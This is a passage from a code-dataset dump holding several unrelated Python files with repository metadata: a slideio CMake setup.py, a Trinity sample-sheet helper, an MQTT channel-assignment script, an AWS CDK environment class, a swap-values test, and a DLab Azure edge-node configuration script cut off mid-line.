CMakeExtension(Extension): def __init__(self, name, source_dir='', build_dir=None): Extension.__init__(self, name, sources=[]) self.source_dir = os.path.abspath(source_dir) self.build_dir = os.path.abspath(build_dir) class CMakeBuild(build_ext): def run(self): try: out = subprocess.check_output(['cmake', '--version']) except OSError: raise RuntimeError( "CMake must be installed to build the following extensions: " + ", ".join(e.name for e in self.extensions) ) if platform.system() == "Windows": cmake_version = LooseVersion( re.search(r'version\s*([\d.]+)', out.decode()).group(1) ) if cmake_version < '3.1.0': raise RuntimeError("CMake >= 3.1.0 is required on Windows") for ext in self.extensions: self.build_extension(ext) def build_extension(self, ext): if not (ext.build_dir is None): self.build_temp = ext.build_dir extdir = os.path.abspath(os.path.dirname( self.get_ext_fullpath(ext.name))) cmake_args = [ '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir, '-DPYTHON_EXECUTABLE=' + sys.executable ] cfg = 'Debug' if self.debug else 'Release' build_args = ['--config', cfg] if platform.system() == "Windows": cmake_args += [ '-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format( cfg.upper(), extdir ) ] if sys.maxsize > 2**32: cmake_args += ['-A', 'x64'] build_args += ['--', '/m'] else: cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg] build_args += ['--', '-j2'] env = os.environ.copy() env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format( env.get('CXXFLAGS', ''), self.distribution.get_version() ) if not os.path.exists(self.build_temp): os.makedirs(self.build_temp) subprocess.check_call( ['cmake', ext.source_dir] + cmake_args, cwd=self.build_temp, env=env ) subprocess.check_call( ['cmake', '--build', '.'] + build_args, cwd=self.build_temp ) patterns = ["*.so"] if PLATFORM == "Windows": patterns = ["*.dll"] elif PLATFORM == "Macos": patterns = ["*.so", "*.dylib"] print("----Look for shared libraries int directory", self.build_temp) extra_files = [] for pattern in patterns: files = find_shared_libs(self.build_temp, pattern) if len(files)>0: extra_files.extend(files) print("----Found libraries:", extra_files) if not os.path.exists(extdir): os.makedirs(extdir) for fl in extra_files: file_name = os.path.basename(fl) destination = os.path.join(extdir, file_name) print("Copy",fl,"->",destination) shutil.copyfile(fl, destination) for lib in REDISTR_LIBS: shutil.copy(find_library(lib), extdir) setup( name='slideio', version=version, author='Stanislav Melnikov, Vadim Popov', author_email='stanislav.melnikov@gmail.com', description='Reading of medical images', long_description=long_description, ext_modules=[CMakeExtension(name = 'slideio', source_dir=source_dir, build_dir=build_dir)], cmdclass=dict(build_ext=CMakeBuild), packages=find_packages(), project_urls={ 'Documentation':'http://slideio.com', "Source Code": "https://gitlab.com/bioslide/slideio.git" }, keywords = 'images, pathology, tissue, medical, czi, svs, afi, scn', package_data={}, classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Science/Research', 'License :: OSI Approved :: BSD License', 'Topic :: Scientific/Engineering', 'Topic :: Scientific/Engineering :: Bio-Informatics', 'Topic :: Scientific/Engineering :: Image Recognition', 'Topic :: Scientific/Engineering :: Medical Science Apps.', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3.9', ], install_requires=['numpy'], extras_require={}, data_files=[( '.', [ 'requirements-dev.txt' ] )], zip_safe=False, )
3,599
18
171
a02429054cb0cf7b20e8267bcc65eb77f6e899a8
1,064
py
Python
workflow/scripts/prep_trinity.py
matinnuhamunada/rnaseq_kadal
4e915866b460206ac499c3022b853aa1dcc65b51
[ "MIT" ]
null
null
null
workflow/scripts/prep_trinity.py
matinnuhamunada/rnaseq_kadal
4e915866b460206ac499c3022b853aa1dcc65b51
[ "MIT" ]
2
2022-01-14T17:43:24.000Z
2022-01-21T11:33:44.000Z
workflow/scripts/prep_trinity.py
matinnuhamunada/rnaseq_kadal
4e915866b460206ac499c3022b853aa1dcc65b51
[ "MIT" ]
null
null
null
import pandas as pd from pathlib import Path import sys def get_trinity_samples(run_name, condition, outfile, samples_path="config/samples.tsv", units_path="config/units.tsv"): """ """ samples = ( pd.read_csv(samples_path, sep="\t", dtype={"ID": str}) .set_index("ID", drop=False) .sort_index() ) units = ( pd.read_csv(units_path, sep="\t", dtype={"ID": str}) .set_index("ID", drop=False) .sort_index() ) trinity = [] subset = samples[samples.loc[:, "Condition"] == condition] for s in subset.index: s_dict = {} s_dict["Condition"] = samples.loc[s, "Condition"] s_dict["Replicate"] = units.loc[s, "unit_name"] s_dict["F"] = units.loc[s, "fq1"] s_dict["R"] = units.loc[s, "fq2"] trinity.append(s_dict) df = pd.DataFrame(trinity) df.to_csv(f"{outfile}", sep="\t", index=False, header=False) return None if __name__ == "__main__": get_trinity_samples(sys.argv[1], sys.argv[2], sys.argv[3])
29.555556
120
0.577068
import pandas as pd from pathlib import Path import sys def get_trinity_samples(run_name, condition, outfile, samples_path="config/samples.tsv", units_path="config/units.tsv"): """ """ samples = ( pd.read_csv(samples_path, sep="\t", dtype={"ID": str}) .set_index("ID", drop=False) .sort_index() ) units = ( pd.read_csv(units_path, sep="\t", dtype={"ID": str}) .set_index("ID", drop=False) .sort_index() ) trinity = [] subset = samples[samples.loc[:, "Condition"] == condition] for s in subset.index: s_dict = {} s_dict["Condition"] = samples.loc[s, "Condition"] s_dict["Replicate"] = units.loc[s, "unit_name"] s_dict["F"] = units.loc[s, "fq1"] s_dict["R"] = units.loc[s, "fq2"] trinity.append(s_dict) df = pd.DataFrame(trinity) df.to_csv(f"{outfile}", sep="\t", index=False, header=False) return None if __name__ == "__main__": get_trinity_samples(sys.argv[1], sys.argv[2], sys.argv[3])
0
0
0
066d4d4b7e35674f6bd507d4b6745a2269a00cea
2,779
py
Python
interfaces/srvr_tools/c_assign.py
krattai/AEBL
a7b12c97479e1236d5370166b15ca9f29d7d4265
[ "BSD-2-Clause" ]
4
2016-04-26T03:43:54.000Z
2016-11-17T08:09:04.000Z
interfaces/srvr_tools/c_assign.py
krattai/AEBL
a7b12c97479e1236d5370166b15ca9f29d7d4265
[ "BSD-2-Clause" ]
17
2015-01-05T21:06:22.000Z
2015-12-07T20:45:44.000Z
interfaces/srvr_tools/c_assign.py
krattai/AEBL
a7b12c97479e1236d5370166b15ca9f29d7d4265
[ "BSD-2-Clause" ]
3
2016-04-26T03:43:55.000Z
2020-11-06T11:02:08.000Z
#!/usr/bin/env python # Copyright (C) 2016 Uvea I. S., Kevin Rattai # # Watch for channel request and assign channel based on prior or unassigned chan # # This software is based on an unknown license, but is available # with no license statement from here: # http://stackoverflow.com/questions/31775450/publish-and-subscribe-with-paho-mqtt-client # # All changes will be under BSD 2 clause license. Code of unknown license # will be removed and replaced with code that will be BSD 2 clause # # Portions of this code is based on the noo-ebs project: # https://github.com/krattai/noo-ebs # # And portions of this code is based on the AEBL project: # https://github.com/krattai/AEBL # import os import paho.mqtt.client as mqtt # reference to MQTT python found here: http://mosquitto.org/documentation/python/ # requires: sudo pip install paho-mqtt # pip requires: sudo apt-get install python-pip message = 'ON' # mqttc.publish("response/" + str(msg.payload),msg.payload); # if 'ACK' in message: # mqttc.publish("alive/chan","NAK"); # if 'TEST' in message: # os.system("/home/user/scripts/test.sh") # mqttc.publish("test/output","NAK"); # mqttcb.publish("test/output",msg.payload); mqttc = mqtt.Client() # Assign event callbacks mqttc.on_message = on_message mqttc.on_connect = on_connect mqttc.on_publish = on_publish mqttc.on_subscribe = on_subscribe # Connect mqttc.connect("ihdn.ca", 1883,60) # mqttc.connect("2001:dead::beef:1", 1883,60) # mosquitto_sub -h 2001:dead::beef -t "hello/+" -t "ihdn/+" -t "test/+" # Continue the network loop mqttc.loop_forever()
29.88172
89
0.651673
#!/usr/bin/env python # Copyright (C) 2016 Uvea I. S., Kevin Rattai # # Watch for channel request and assign channel based on prior or unassigned chan # # This software is based on an unknown license, but is available # with no license statement from here: # http://stackoverflow.com/questions/31775450/publish-and-subscribe-with-paho-mqtt-client # # All changes will be under BSD 2 clause license. Code of unknown license # will be removed and replaced with code that will be BSD 2 clause # # Portions of this code is based on the noo-ebs project: # https://github.com/krattai/noo-ebs # # And portions of this code is based on the AEBL project: # https://github.com/krattai/AEBL # import os import paho.mqtt.client as mqtt # reference to MQTT python found here: http://mosquitto.org/documentation/python/ # requires: sudo pip install paho-mqtt # pip requires: sudo apt-get install python-pip message = 'ON' def on_connect(mosq, obj, rc): mqttc.subscribe("request/chan", 0) print("rc: " + str(rc)) def on_message(mosq, obj, msg): global message print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload)) message = msg.payload if os.path.isfile('chan/' + str(msg.payload)): # get channel from file fchan = open("chan/" + str(msg.payload)) chan = fchan.readline() chan = chan.rstrip('\n') fchan.close() else: # get next channel, create file and insert channel fchan = open("chan/.0chan","r+") chan = fchan.readline() chan = chan.rstrip('\n') nchan = int(chan) + 1 fchan.seek(0, 0) fchan.write(repr(nchan).zfill(6) + "\n") fchan.close() fchan = open("chan/" + str(msg.payload),"w+") fchan.write(chan + "\n") fchan.close() mqttc.publish("response/" + str(msg.payload),chan); # mqttc.publish("response/" + str(msg.payload),msg.payload); # if 'ACK' in message: # mqttc.publish("alive/chan","NAK"); # if 'TEST' in message: # os.system("/home/user/scripts/test.sh") # mqttc.publish("test/output","NAK"); # mqttcb.publish("test/output",msg.payload); def on_publish(mosq, obj, mid): print("mid: " + str(mid)) def on_subscribe(mosq, obj, mid, granted_qos): print("Subscribed: " + str(mid) + " " + str(granted_qos)) def on_log(mosq, obj, level, string): print(string) mqttc = mqtt.Client() # Assign event callbacks mqttc.on_message = on_message mqttc.on_connect = on_connect mqttc.on_publish = on_publish mqttc.on_subscribe = on_subscribe # Connect mqttc.connect("ihdn.ca", 1883,60) # mqttc.connect("2001:dead::beef:1", 1883,60) # mosquitto_sub -h 2001:dead::beef -t "hello/+" -t "ihdn/+" -t "test/+" # Continue the network loop mqttc.loop_forever()
1,050
0
114
4388231220b15bd9c8b6a792db56c557ffa340b3
2,948
py
Python
source/infrastructure/personalize/aws_lambda/functions/environment.py
turnoutnow/maintaining-personalized-experiences-with-machine-learning
b45588c094734cce70198811890a28e65b8e39e1
[ "Apache-2.0" ]
null
null
null
source/infrastructure/personalize/aws_lambda/functions/environment.py
turnoutnow/maintaining-personalized-experiences-with-machine-learning
b45588c094734cce70198811890a28e65b8e39e1
[ "Apache-2.0" ]
null
null
null
source/infrastructure/personalize/aws_lambda/functions/environment.py
turnoutnow/maintaining-personalized-experiences-with-machine-learning
b45588c094734cce70198811890a28e65b8e39e1
[ "Apache-2.0" ]
null
null
null
# ###################################################################################################################### # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # # # # Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance # # with the License. You may obtain a copy of the License at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, software distributed under the License is distributed # # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for # # the specific language governing permissions and limitations under the License. # # ###################################################################################################################### from dataclasses import dataclass, field from aws_cdk.aws_lambda import IFunction from aws_cdk.core import Aws from aws_solutions.cdk.aws_lambda.environment_variable import EnvironmentVariable @dataclass class Environment: """ Tracks environment variables common to AWS Lambda functions deployed by this solution """ scope: IFunction solution_name: EnvironmentVariable = field(init=False, repr=False) solution_id: EnvironmentVariable = field(init=False, repr=False) solution_version: EnvironmentVariable = field(init=False, repr=False) log_level: EnvironmentVariable = field(init=False, repr=False) powertools_service_name: EnvironmentVariable = field(init=False, repr=False)
60.163265
120
0.542062
# ###################################################################################################################### # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. # # # # Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance # # with the License. You may obtain a copy of the License at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, software distributed under the License is distributed # # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for # # the specific language governing permissions and limitations under the License. # # ###################################################################################################################### from dataclasses import dataclass, field from aws_cdk.aws_lambda import IFunction from aws_cdk.core import Aws from aws_solutions.cdk.aws_lambda.environment_variable import EnvironmentVariable @dataclass class Environment: """ Tracks environment variables common to AWS Lambda functions deployed by this solution """ scope: IFunction solution_name: EnvironmentVariable = field(init=False, repr=False) solution_id: EnvironmentVariable = field(init=False, repr=False) solution_version: EnvironmentVariable = field(init=False, repr=False) log_level: EnvironmentVariable = field(init=False, repr=False) powertools_service_name: EnvironmentVariable = field(init=False, repr=False) def __post_init__(self): cloudwatch_namespace_id = f"personalize_solution_{Aws.STACK_NAME}" cloudwatch_service_id_default = f"Workflow" self.solution_name = EnvironmentVariable(self.scope, "SOLUTION_NAME") self.solution_id = EnvironmentVariable(self.scope, "SOLUTION_ID") self.solution_version = EnvironmentVariable(self.scope, "SOLUTION_VERSION") self.log_level = EnvironmentVariable(self.scope, "LOG_LEVEL", "INFO") self.powertools_service_name = EnvironmentVariable( self.scope, "POWERTOOLS_SERVICE_NAME", cloudwatch_service_id_default ) self.powertools_metrics_namespace = EnvironmentVariable( self.scope, "POWERTOOLS_METRICS_NAMESPACE", cloudwatch_namespace_id )
751
0
27
f4b84ddd46fdf014d7210c8b0802837e20498fe3
356
py
Python
8kyu/test_swap_values.py
adun/codewars.py
89e7d81e9ca05a432007d634892c1cba28f5b715
[ "MIT" ]
null
null
null
8kyu/test_swap_values.py
adun/codewars.py
89e7d81e9ca05a432007d634892c1cba28f5b715
[ "MIT" ]
null
null
null
8kyu/test_swap_values.py
adun/codewars.py
89e7d81e9ca05a432007d634892c1cba28f5b715
[ "MIT" ]
null
null
null
# I would like to be able to pass an array with two elements to my swapValues function # to swap the values. However it appears that the values aren't changing. # Can you figure out what's wrong here?
25.428571
86
0.676966
# I would like to be able to pass an array with two elements to my swapValues function # to swap the values. However it appears that the values aren't changing. # Can you figure out what's wrong here? def swap_values(args): args[0], args[1] = args[1], args[0] def test_swap_values(): arr = [1, 2] swap_values(arr) assert arr == [2, 1]
106
0
46
bcd43fdd32c531b45f4fbb862a550f3a2becbeff
20,304
py
Python
infrastructure-provisioning/src/general/scripts/azure/edge_configure.py
ofuks/DLab
460804a2559843d099936fe40373093f9bf9edcb
[ "Apache-2.0" ]
null
null
null
infrastructure-provisioning/src/general/scripts/azure/edge_configure.py
ofuks/DLab
460804a2559843d099936fe40373093f9bf9edcb
[ "Apache-2.0" ]
null
null
null
infrastructure-provisioning/src/general/scripts/azure/edge_configure.py
ofuks/DLab
460804a2559843d099936fe40373093f9bf9edcb
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/python # ***************************************************************************** # # Copyright (c) 2016, EPAM SYSTEMS INC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ****************************************************************************** import json from dlab.fab import * from dlab.meta_lib import * import sys, time, os from dlab.actions_lib import * if __name__ == "__main__": local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['edge_user_name'], os.environ['request_id']) local_log_filepath = "/logs/edge/" + local_log_filename logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s', level=logging.DEBUG, filename=local_log_filepath) try: print('Generating infrastructure names and tags') edge_conf = dict() edge_conf['service_base_name'] = os.environ['conf_service_base_name'] edge_conf['resource_group_name'] = os.environ['azure_resource_group_name'] edge_conf['key_name'] = os.environ['conf_key_name'] edge_conf['vpc_name'] = os.environ['azure_vpc_name'] edge_conf['region'] = os.environ['azure_region'] edge_conf['subnet_name'] = os.environ['azure_subnet_name'] edge_conf['user_name'] = os.environ['edge_user_name'].replace('_', '-') edge_conf['user_keyname'] = os.environ['edge_user_name'] edge_conf['private_subnet_name'] = edge_conf['service_base_name'] + '-' + edge_conf['user_name'] + '-subnet' edge_conf['instance_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge' edge_conf['network_interface_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge-nif' edge_conf['static_public_ip_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + '-edge-ip' edge_conf['primary_disk_name'] = edge_conf['instance_name'] + '-disk0' edge_conf['instance_dns_name'] = 'host-' + edge_conf['instance_name'] + '.' + edge_conf['region'] + '.cloudapp.azure.com' edge_conf['user_storage_account_name'] = edge_conf['service_base_name'] + '-' + edge_conf[ 'user_name'] + '-storage' edge_conf['user_container_name'] = (edge_conf['service_base_name'] + '-' + edge_conf['user_name'] + '-container').lower() edge_conf['shared_storage_account_name'] = edge_conf['service_base_name'] + '-shared-storage' edge_conf['shared_container_name'] = (edge_conf['service_base_name'] + '-shared-container').lower() edge_conf['datalake_store_name'] = edge_conf['service_base_name'] + '-ssn-datalake' edge_conf['datalake_shared_directory_name'] = edge_conf['service_base_name'] + '-shared-folder' edge_conf['datalake_user_directory_name'] = '{0}-{1}-folder'.format(edge_conf['service_base_name'], edge_conf['user_name']) edge_conf['edge_security_group_name'] = edge_conf['instance_name'] + '-sg' edge_conf['notebook_security_group_name'] = edge_conf['service_base_name'] + "-" + edge_conf['user_name'] + \ '-nb-sg' edge_conf['master_security_group_name'] = edge_conf['service_base_name'] + '-' \ + edge_conf['user_name'] + '-dataengine-master-sg' edge_conf['slave_security_group_name'] = edge_conf['service_base_name'] + '-' \ + edge_conf['user_name'] + '-dataengine-slave-sg' edge_conf['dlab_ssh_user'] = os.environ['conf_os_user'] keyfile_name = "{}{}.pem".format(os.environ['conf_key_dir'], edge_conf['key_name']) edge_conf['private_subnet_cidr'] = AzureMeta().get_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']).address_prefix edge_conf['edge_public_ip'] = AzureMeta().get_instance_public_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) edge_conf['edge_private_ip'] = AzureMeta().get_private_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) instance_hostname = AzureMeta().get_private_ip_address(edge_conf['resource_group_name'], edge_conf['instance_name']) except Exception as err: append_result("Failed to generate infrastructure names", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: if os.environ['conf_os_family'] == 'debian': initial_user = 'ubuntu' sudo_group = 'sudo' if os.environ['conf_os_family'] == 'redhat': initial_user = 'ec2-user' sudo_group = 'wheel' logging.info('[CREATING DLAB SSH USER]') print('[CREATING DLAB SSH USER]') params = "--hostname {} --keyfile {} --initial_user {} --os_user {} --sudo_group {}".format\ (instance_hostname, os.environ['conf_key_dir'] + os.environ['conf_key_name'] + ".pem", initial_user, edge_conf['dlab_ssh_user'], sudo_group) try: local("~/scripts/{}.py {}".format('create_ssh_user', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed creating ssh user 'dlab'.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING PREREQUISITES]') logging.info('[INSTALLING PREREQUISITES]') params = "--hostname {} --keyfile {} --user {} --region {}".\ format(instance_hostname, keyfile_name, edge_conf['dlab_ssh_user'], os.environ['azure_region']) try: local("~/scripts/{}.py {}".format('install_prerequisites', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed installing apps: apt & pip.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING HTTP PROXY]') logging.info('[INSTALLING HTTP PROXY]') additional_config = {"exploratory_subnet": edge_conf['private_subnet_cidr'], "template_file": "/root/templates/squid.conf"} params = "--hostname {} --keyfile {} --additional_config '{}' --user {}" \ .format(instance_hostname, keyfile_name, json.dumps(additional_config), edge_conf['dlab_ssh_user']) try: local("~/scripts/{}.py {}".format('configure_http_proxy', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed installing http proxy.", str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: print('[INSTALLING USERs KEY]') logging.info('[INSTALLING USERs KEY]') additional_config = {"user_keyname": edge_conf['user_keyname'], "user_keydir": os.environ['conf_key_dir']} params = "--hostname {} --keyfile {} --additional_config '{}' --user {}".format( instance_hostname, keyfile_name, json.dumps(additional_config), edge_conf['dlab_ssh_user']) try: local("~/scripts/{}.py {}".format('install_user_key', params)) except: traceback.print_exc() raise Exception except Exception as err: append_result("Failed installing users key. Excpeption: " + str(err)) AzureActions().remove_instance(edge_conf['resource_group_name'], edge_conf['instance_name']) AzureActions().remove_subnet(edge_conf['resource_group_name'], edge_conf['vpc_name'], edge_conf['private_subnet_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['edge_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['notebook_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['master_security_group_name']) AzureActions().remove_security_group(edge_conf['resource_group_name'], edge_conf['slave_security_group_name']) for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: AzureActions().remove_storage_account(edge_conf['resource_group_name'], storage_account.name) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: AzureActions().remove_datalake_directory(datalake.name, edge_conf['datalake_user_directory_name']) sys.exit(1) try: for storage_account in AzureMeta().list_storage_accounts(edge_conf['resource_group_name']): if edge_conf['shared_storage_account_name'] == storage_account.tags["Name"]: shared_storage_account_name = storage_account.name if edge_conf['user_storage_account_name'] == storage_account.tags["Name"]: user_storage_account_name = storage_account.name print('[SUMMARY]') logging.info('[SUMMARY]') print("Instance name: {}".format(edge_conf['instance_name'])) print("Hostname: {}".format(edge_conf['instance_dns_name'])) print("Public IP: {}".format(edge_conf['edge_public_ip'])) print("Private IP: {}".format(edge_conf['edge_private_ip'])) print("Key name: {}".format(edge_conf['key_name'])) print("User storage account name: {}".format(user_storage_account_name)) print("User container name: {}".format(edge_conf['user_container_name'])) if os.environ['azure_datalake_enable'] == 'true': for datalake in AzureMeta().list_datalakes(edge_conf['resource_group_name']): if edge_conf['datalake_store_name'] == datalake.tags["Name"]: datalake_id = datalake.name print("Data Lake name: {}".format(datalake_id)) print("Data Lake tag name: {}".format(edge_conf['datalake_store_name'])) print("Data Lake Store user directory name: {}".format(edge_conf['datalake_user_directory_name'])) print("Notebook SG: {}".format(edge_conf['notebook_security_group_name'])) print("Edge SG: {}".format(edge_conf['edge_security_group_name'])) print("Notebook subnet: {}".format(edge_conf['private_subnet_cidr'])) with open("/root/result.json", 'w') as result: if os.environ['azure_datalake_enable'] == 'false': res = {"hostname": edge_conf['instance_dns_name'], "public_ip": edge_conf['edge_public_ip'], "ip": edge_conf['edge_private_ip'], "key_name": edge_conf['key_name'], "user_storage_account_name": user_storage_account_name, "user_container_name": edge_conf['user_container_name'], "shared_storage_account_name": shared_storage_account_name, "shared_container_name": edge_conf['shared_container_name'], "user_storage_account_tag_name": edge_conf['user_storage_account_name'], "tunnel_port": "22", "socks_port": "1080", "notebook_sg": edge_conf['notebook_security_group_name'], "edge_sg": edge_conf['edge_security_group_name'], "notebook_subnet": edge_conf['private_subnet_cidr'], "instance_id": edge_conf['instance_name'], "full_edge_conf": edge_conf, "Action": "Create new EDGE server"} else: res = {"hostname": edge_conf['instance_dns_name'], "public_ip": edge_conf['edge_public_ip'], "ip": edge_conf['edge_private_ip'], "key_name": edge_conf['key_name'], "user_storage_account_name": user_storage_account_name, "user_container_name": edge_conf['user_container_name'], "shared_storage_account_name": shared_storage_account_name, "shared_container_name": edge_conf['shared_container_name'], "user_storage_account_tag_name": edge_conf['user_storage_account_name'], "datalake_name": datalake_id, "datalake_tag_name": edge_conf['datalake_store_name'], "datalake_shared_directory_name": edge_conf['datalake_shared_directory_name'], "datalake_user_directory_name": edge_conf['datalake_user_directory_name'], "tunnel_port": "22", "socks_port": "1080", "notebook_sg": edge_conf['notebook_security_group_name'], "edge_sg": edge_conf['edge_security_group_name'], "notebook_subnet": edge_conf['private_subnet_cidr'], "instance_id": edge_conf['instance_name'], "full_edge_conf": edge_conf, "Action": "Create new EDGE server"} print(json.dumps(res)) result.write(json.dumps(res)) except: print("Failed writing results.") sys.exit(0) sys.exit(0)
66.570492
131
0.625
#!/usr/bin/python # ***************************************************************************** # # Copyright (c) 2016, EPAM SYSTEMS INC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ****************************************************************************** import json from dlab.fab import * from dlab.meta_lib import * import sys, time, os from dlab.actions_lib import * if __name__ == "__main__": local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['edge_user_name'], os.environ['request_id']) local_log_filepath = "/logs/edge/" + local_log_filename logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s', level=logging.DEBUG, filename=local_log_filepath) try: print('Generating infrastructure names and tags') edge_conf = dict() edge_conf['service_base_name'] = os.environ['conf_service_base_name'] edge_conf['resource_group_name'] = os.environ['azure_resource_group_name'] edge_conf['key_name'] = os.environ['conf_key_name'] edge_conf['vpc_name'] = os.environ['azure_vpc_name'] edge_conf['region'] = os.environ['azure_region'] edge_conf['subnet_name'] = os.environ['azure_subnet_name'] edge_conf['user_name'] = os.environ['edge_user_name'].replace('_', '-') edge_conf['user_keyname'] = os.environ['edge_user_name'] edge_conf['private_subnet_name'] = edge_conf['service_base_name'] + '-' + edge_conf['user_name'] + '-subnet' edge_conf['instance_name'] = 